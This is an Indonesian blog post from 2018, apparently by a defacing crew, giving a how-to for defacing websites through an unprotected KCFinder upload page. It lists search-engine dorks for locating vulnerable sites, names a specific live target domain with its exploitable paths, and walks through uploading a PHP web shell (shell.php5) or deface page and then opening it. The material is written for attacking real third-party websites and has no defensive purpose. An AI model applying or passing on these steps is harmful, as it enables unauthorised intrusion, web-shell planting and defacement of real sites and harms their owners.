Sabtu, 21 Juli 2018

Cara Deface Metode Kcfinder Vulnerability Upload Shell




Author:./ScXr00t
Oke karena ini postingan pertama tim ane mhank:v ane jd pembuka aja Ea:*

-Siapin SC dulu mhank
-shell klo perlu:v

DORK
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload
panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/files
inurl:/panel/kcfinder/ intext:2017
  1. Sekarang kita dorking dlu ea :v

2. Pilih salah satu web yang menurut otak vokep lu Vuln:v , contoh live target ~> http://nakkargo.com.tr

3. Jika tampilan nya beda atau bukan tempat upload :v masukin exploitnya
exploit > http://nakkargo.com.tr lalu pilih browse.php atau langsung tambahin aja browse php nya dibelakang:v
dikarenakan di atas gue menggunakan dork /panel/kcfinder/ maka exploit nya
http://nakkargo.com.tr/panel/kcfinder
http://nakkargo.com.tr/panel/Kcfinder/browse.php *intinya tergantung path ea mhank:v
4.klo udh tinggal upload aja ea disitu:v
5.upload Ext Shell.php5 / scriptnya.html
6. Jika sudah terupload , silakan akses shell di > nakkargo.com.tr/panel/kcfinder/upload/files/shell.php5

Simple kan:v oke segitu dulu ea mhank:v tunggu postingan berikutnya :v see u mamank:v
Diposting oleh di

3 komentar:

Langganan: Posting Komentar (Atom)